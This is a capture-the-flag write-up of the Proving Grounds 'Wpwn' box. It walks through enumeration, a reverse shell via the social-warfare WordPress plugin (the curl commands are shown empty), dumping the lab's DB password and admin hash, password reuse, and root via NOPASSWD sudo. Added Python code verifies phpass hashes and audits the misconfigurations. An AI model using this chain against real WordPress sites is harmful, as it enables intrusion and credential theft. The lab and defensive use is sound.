Proving Grounds | Wpwn

Hi amazing hackers from around the world, back again with another write-up of a box. This time it’s from OffSec’s Proving Grounds. If you would like to check out more write-ups, please do check my GitLab repository.

Try harder! Credits to Offensive Security



22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 59:b7:db:e0:ba:63:76:af:d0:20:03:11:e1:3c:0e:34 (RSA)
| 256 2e:20:56:75:84:ca:35:ce:e3:6a:21:32:1f:e7:f5:9a (ECDSA)
|_ 256 0d:02:83:8b:1a:1c:ec:0f:ae:74:cc:7b:da:12:89:9e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Basic information that you’ll get.


  • Apache 2.4.38
  • WordPress 5.5
  • robots.txt contains:
      /secret -> 404
      # haha, just kidding. Focus on real stuff ma boi

Looks like it’s just a fake robots.txt, that’s fine keep enumerating!


FeroxBuster is a tool to discover directories and files on a server. It’s similar to GoBuster, but it’s much faster and it has emojis!

  • Found /wordpress
      200        3l        5w       23c
      301        9l       28w      320c
  • Now that we know the target is running WordPress, we can run another tool.


wpscan is a tool made by wpscanteam to enumerate and test the security of WordPress installations.

  • 1 user identified, admin
  • Plugins detected social-warfare version 3.5.2


Now we have some information about our target, let’s do some research!

curl ""
  • We’ll see the hostname in the response
<!DOCTYPE html>
<html lang="en-US">
  • Let’s get a reverse shell.
  • Payload needs to be URL encoded.
curl ""

pwncat is a tool similar to netcat, but with more features than netcat.

[15:09:39] Welcome to pwncat 🐈!
[15:10:28] received connection from
[15:10:31] upgrading from /usr/bin/dash to /usr/bin/bash
[15:10:34] registered new host w/ db

Privilege Escalation

Now that we have a shell in the machine, it’s time to escalate our privileges!

  • We are user www-data and need a password for sudo -l.
  • Found MySQL credentials for the DB:
/** MySQL database username */
define( 'DB_USER', 'wp_user' );

/** MySQL database password */
define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' );
  • Found hash for admin in wp_users table.
| user_login | user_pass |
| admin | $P$BoIPbgc5i8WpBP2HzqoeQW3jfRVAyU1 |
  • Hash format is WordPress (phpass), hashcat mode 400.
  • While we’re trying to crack the password, we should look around more.
  • Found local.txt in /var/www
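The admin hash pulled from wp_users is a phpass "portable" hash, which is what hashcat mode 400 cracks. The Python below is an added example for this write-up, not code from the original post: it implements that format so you can see what the cracker is actually doing (salted MD5 iterated 2^13 times, a cheap amount of work by today's standards, which is why cracking these offline is realistic). The parser is run on the admin hash from the table; the password check runs against a hash generated locally, because the real password is not shown here.

```python
"""Parse and verify WordPress/phpass portable hashes ($P$ / $H$).

Added example for this write-up, not the post's own code. ADMIN_HASH is the
value shown in the wp_users dump above; the test password is constructed.
"""
import hashlib
import hmac
import os

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

ADMIN_HASH = "$P$BoIPbgc5i8WpBP2HzqoeQW3jfRVAyU1"  # from the write-up's wp_users table


def _encode64(data: bytes) -> str:
    """phpass's own base64 variant (not RFC 4648): 3 bytes -> 4 chars, little-endian."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def parse_setting(stored: str) -> dict:
    """Split '$P$' + count char + 8-char salt (+ 22-char digest) into fields.

    Accepts either the 12-char setting prefix or a full 34-char hash.
    """
    if len(stored) not in (12, 34) or stored[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(stored[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("iteration count out of range")
    return {
        "count_log2": count_log2,
        "iterations": 1 << count_log2,
        "salt": stored[4:12],
        "digest": stored[12:] or None,
    }


def phpass_hash(password: str, setting: str) -> str:
    """Recompute the full hash for `password` under a 12-char setting prefix."""
    fields = parse_setting(setting[:12])
    pw = password.encode("utf-8")
    # md5(salt + password), then md5(previous + password) repeated 2^count_log2 times
    digest = hashlib.md5(fields["salt"].encode("ascii") + pw).digest()
    for _ in range(fields["iterations"]):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest)


def verify(password: str, stored: str) -> bool:
    """Constant-time comparison of the recomputed hash against the stored one."""
    return hmac.compare_digest(phpass_hash(password, stored[:12]), stored)


def make_hash(password: str, count_log2: int = 13, salt: str = "") -> str:
    """Create a new hash; count_log2 = 13 ('B') is the WordPress default seen above."""
    if not salt:
        salt = _encode64(os.urandom(6))[:8]
    return phpass_hash(password, "$P$" + ITOA64[count_log2] + salt)


if __name__ == "__main__":
    info = parse_setting(ADMIN_HASH)
    print(f"admin hash: {info['iterations']} MD5 iterations, salt {info['salt']!r}")
    sample = make_hash("constructed-test-password")  # constructed, not the real password
    print(sample, verify("constructed-test-password", sample), verify("guess", sample))
```

The iteration count is the only tunable in this scheme, and a 2^13 MD5 chain costs a modern GPU almost nothing per guess, so the defensive answer is not a longer chain but a password policy strong enough that wordlist attacks fail, and rotating the admin password whenever the database has been exposed.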

One thing that I like to check is whether the DB password is reused for a user account, since it very often is.

  • We have one user which is takis
  • DB password is reused for user takis. We are now user takis.
  • Check sudo -l
User takis may run the following commands on wpwn:
    (ALL) NOPASSWD: ALL

Well, look at that: we don’t even need to find another vector to escalate to root.

  • We can run sudo on anything, run sudo bash to gain root privileges.
  • proof.txt in /root
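The chain from www-data to root here rests on two configuration weaknesses rather than on any exploit: the DB credentials that WordPress keeps in wp-config.php were reused for an OS account, and that account's sudo rule grants everything without a password. The script below is an added example for this write-up, not code from the post: a small audit that parses the wp-config.php define() lines and the `sudo -l` output in the formats shown above and flags exactly those conditions. The two inputs are constructed from the output in the write-up (the DB password is replaced with a placeholder), and the file mode passed in is an assumed value.

```python
"""Flag the two misconfigurations this box chains into root.

Added example, not from the original post. Sample inputs are constructed from
the write-up's output; the DB password is a placeholder and the mode is assumed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample: the define() lines WordPress keeps in wp-config.php.
WP_CONFIG_SAMPLE = """\
/** MySQL database username */
define( 'DB_USER', 'wp_user' );

/** MySQL database password */
define( 'DB_PASSWORD', 'PLACEHOLDER_DB_PASSWORD' );
"""

# Constructed sample: the `sudo -l` output shown in the write-up.
SUDO_L_SAMPLE = """\
User takis may run the following commands on wpwn:
    (ALL) NOPASSWD: ALL
"""

DEFINE_RE = re.compile(r"define\(\s*'(\w+)'\s*,\s*'([^']*)'\s*\)")
# A sudoers rule line as printed by `sudo -l`:  (runas) [TAG: ...] command
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$"
)


@dataclass
class SudoRule:
    runas: str
    tags: List[str]
    cmd: str


def parse_wp_config(text: str) -> Dict[str, str]:
    """Return the single-quoted define() constants of a wp-config.php as a dict."""
    return dict(DEFINE_RE.findall(text))


def parse_sudo_rules(text: str) -> List[SudoRule]:
    """Extract runas / tags / command from each rule line of `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header lines such as "User takis may run ..." are skipped
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        rules.append(SudoRule(m.group("runas").strip(), tags, m.group("cmd")))
    return rules


def audit(wp_config: str, wp_config_mode: int, sudo_l: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings = []
    conf = parse_wp_config(wp_config)
    if "DB_PASSWORD" in conf:
        findings.append(
            "INFO: wp-config.php holds the MySQL password in plaintext; "
            "it must be unique and never reused for an OS account"
        )
    if wp_config_mode & 0o004:
        findings.append(
            f"MEDIUM: wp-config.php is world-readable (mode {wp_config_mode:o}); "
            "restrict it to the web server user"
        )
    for rule in parse_sudo_rules(sudo_l):
        if rule.cmd == "ALL" and "NOPASSWD" in rule.tags:
            findings.append(
                f"CRITICAL: sudo rule '({rule.runas}) NOPASSWD: ALL' gives root "
                "without a password to anyone who becomes this user"
            )
        elif rule.cmd == "ALL":
            findings.append(
                f"HIGH: sudo rule '({rule.runas}) ALL' gives full root to anyone "
                "holding this user's password"
            )
    return findings


if __name__ == "__main__":
    for finding in audit(WP_CONFIG_SAMPLE, 0o644, SUDO_L_SAMPLE):  # 0o644 is assumed
        print(finding)
```

Run against the box's own output the audit reports all three conditions; a hardened host (unique DB password, wp-config.php at 0640 owned by root with the web server's group, and sudo limited to the specific commands the user needs) produces no findings. Password reuse itself cannot be detected from these files alone, which is why the INFO finding is phrased as a policy requirement.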

And that’s all, we’re root!

Student that loves FOSS